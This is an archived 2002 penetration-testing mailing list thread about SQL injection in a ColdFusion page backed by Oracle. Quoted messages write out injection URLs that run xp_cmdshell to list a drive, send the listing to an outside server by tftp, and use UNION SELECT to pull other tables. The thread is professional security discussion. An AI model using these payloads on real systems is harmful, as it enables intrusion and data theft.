Penetration Testing mailing list archives
RE: CFM SQL injection
From: "Wertheimer, Ishai" <iwertheimer () kpmg com>
Date: Tue, 1 Jan 2002 01:57:06 -0500
Note that the response you got was from Oracle sql server and the xp_cmdshell is for MS-SQL Server ... You should better use union or alike get unauthorized data from the database. Ishai Wertheimer -----Original Message----- From: Charlie Liserne [mailto:Chili () SexMagnet com] Sent: Monday, December 24, 2001 9:14 PM To: pen-test () security-focus com Subject: Re: CFM SQL injection Hi, I'm trying to get the C:/ directory, but I'm not able to do that. This is a non-intrusive pen-test, so I wouldn't like to have to exec something like: http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'dir *.* > c:\listing.txt' --' http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'tftp listing.txt my.server' --' I would like to get a listing of the c: directory in a clean way, without writing to disk, and get the results appearing in my web browser. I know some column names, but I can't figure how could be possible read or modify it. Also, I'm not able to get a list of the directory; The ' escape character isn't necesary, but when i do: http://www.server.es/page.cfm?page_id=12; EXEC master..xp_cmdshell 'dir'; The response is: ODBC Error Code = S1000 (General error) [Oracle][ODBC][Ora]ORA-00911: invalid character Where are the invalid character?? How could be possible to take advantage from a coldfusion error programming? Sometime ago, in this mailing list appears a message from Rick Redman (Minga), speaking about how easy is to break into a Coldfusion app if the programmer aren't 100% trained in secure coding practices. I was searching in the Internet about this, and how to take advantage of the programming errors, but I can't figure out how to pervert a cfm application. Do you know if there are any document about this? Best Regards, Charlie. *********** REPLY SEPARATOR ***********
It looks like the query that you're attacking isn't prepending and appending quotes to your input. The string build probably looks a lil' sumthin' like this: Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID
=
" & strPageID This means that there is no need to use quotes in order to perform a successful injection. So, try something like this: http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1 Hopefully this will return an error complaining about an invalid table name, or at least another error that may give you a better idea of what
the
web application is doing with your argument.
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ***************************************************************************** The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email are subject to the terms and conditions expressed in the governing KPMG client engagement letter. ***************************************************************************** ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- RE: CFM SQL injection Wertheimer, Ishai (Jan 01)